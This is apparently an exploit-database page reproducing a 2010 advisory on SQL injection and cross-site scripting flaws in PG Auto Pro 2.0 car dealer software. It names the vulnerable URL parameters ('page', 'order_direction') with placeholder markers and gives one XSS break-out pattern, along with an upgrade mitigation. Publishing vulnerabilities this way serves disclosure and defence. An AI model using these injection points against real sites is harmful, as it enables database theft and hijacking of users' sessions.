header-logo
Suggest Exploit
vendor:
PG Auto Pro
by:
Sid3^effects aKa HaRi
9,3
CVSS
HIGH
SQL Injection and XSS
89
CWE
Product Name: PG Auto Pro
Affected Version From: PG Auto Pro 2.0
Affected Version To: PG Auto Pro 2.0.2
Patch Exists: YES
Related CWE: CVE-2010-2090
CPE: a:pgautopro:pg_auto_pro:2.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0602/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux,Windows
2010

PGAUTOPro SQLi and XSS Vulnerability

PG Auto Pro is prone to an SQL injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these issues to manipulate SQL queries, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. An attacker can also exploit this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site.

Mitigation:

Upgrade to the latest version of PG Auto Pro
Source

Exploit-DB raw data:

        =======================================
          PGAUTOPro SQLi and XSS Vulnerability
        =======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : PGAUTOPro SQLi and XSS Vulnerability
Date : june, 9 2010
Vendor url :http://www.pgautopro.com/
Platform: Linux,Windows
Price: AUD$450
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members.

###############################################################################################################
Description:

Full Featured Car Dealer Inventory Software - PG Auto Pro
Our Software Solution will meet the requirements of Private Auto Dealers, Auto Dealership Companies and other Enterprises selling Vehicles.

The Software fundamental features will help starting your own Auto Classifieds Website:
- huge vehicles database with 3000 Models approximately
- possibility to add any new car that's missing in the database
- a powerful option of monetizing auto website - charging users for paid packages and additional services, selling banner places to 

advertisirs, placing your own AdSense contextual ads will let you derive profit from the site
- a good chance for Car Dealers to sell their autos faster than before due to the comprehensive search options on the site.
###############################################################################################################

Xploit: SQLi Vulnerability

DEMO  

URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl

e%2Fbuy_do_search&page=[SQLi]

###############################################################################################################
Xploit: XSS Vulnerability

  Attack Pattern: '"-->

  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]


###############################################################################################################
# 0day no more 
# Sid3^effects

Navigation

Suggest Exploit

Services By CQR